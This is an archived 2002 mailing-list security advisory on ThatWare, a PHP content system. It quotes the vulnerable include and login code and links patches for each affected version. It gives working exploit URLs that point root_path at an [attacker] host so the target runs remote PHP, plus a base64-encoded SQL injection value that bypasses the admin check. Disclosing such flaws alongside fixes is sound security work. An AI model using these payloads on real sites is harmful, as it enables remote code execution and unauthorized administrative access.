Informations : °°°°°°°°°°°°°° Versions : ? -> 0.3 -> 0.5.3 Website : http://www.thatware.org Problems : - Include file - SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° artlist.php (v0.5.2, 0.5.3) : ------------------------------------- include $root_path.'thatfile.php'; ------------------------------------- config.php (v? -> 0.3 -> 0.5.3) : ------------------------------------- include $root_path."db_settings.php"; ------------------------------------- thatfile.php (v? -> 0.3 -> 0.5.2) : ------------------------------------------------------------------------ if (!IsSet($thatfile)) { include($root_path."config.php"); if (!IsSet($translation_set)) { include $root_path."messages.$language.php"; } #Translation module, even for english needed! ------------------------------------------------------------------------ auth.inc.php (v? -> 0.3 -> 0.5.0) : ------------------------------------------------------------------------ $admintest = 0; $mod_ok = 0; $moderator = 0; if(isset($user)) { if (!$thatfile) include("thatfile.php"); $admin = base64_decode($user); $admin = explode(":", $admin); if (empty($admin[0]) || empty($admin[2])) exit; $aid = $admin[1]; dbconnect(); $result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'"); if(!$result) { echo "Oh oh... select from database failed for admin check"; exit; } else { list($auth_rights)=mysql_fetch_row($result); $auth_rights=explode(",",$auth_rights); if (!empty($auth_rights)) { $admintest=1; if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) { $moderator=1; $mod_ok=1; } } } } ------------------------------------------------------------------------ Exploits : °°°°°°°°°° v0.5.2, 0.5.3 : http://[target]/artlist.php?root_path=http://[attacker]/ with http://[attacker]/thatfile.php v? -> 0.3 -> 0.5.3 : http://[target]/config.php?root_path=http://[attacker]/ with http://[attacker]/db_settings.php v? -> 0.3 -> 0.5.2 : http://[target]/thatfile.php?root_path=http://[attacker]/&language=1 with http://[attacker]/config.php and http://[attacker]/messages.1.php v? -> 0.3 -> 0.5.0 : http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n ( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=') Patchs : °°°°°°°° 0.5.3: http://www.phpsecure.org/patch/dl.php?id=47 0.5.2: http://www.phpsecure.org/patch/dl.php?id=51 0.5.0: http://www.phpsecure.org/patch/dl.php?id=50 0.4.5: http://www.phpsecure.org/patch/dl.php?id=52 0.4.4: http://www.phpsecure.org/patch/dl.php?id=49 0.4.3: http://www.phpsecure.org/patch/dl.php?id=48 0.4.2: http://www.phpsecure.org/patch/dl.php?id=53 0.4.1: http://www.phpsecure.org/patch/dl.php?id=54 0.4: http://www.phpsecure.org/patch/dl.php?id=55 0.3: http://www.phpsecure.org/patch/dl.php?id=56 More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/Thatware.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 07:51:58 PST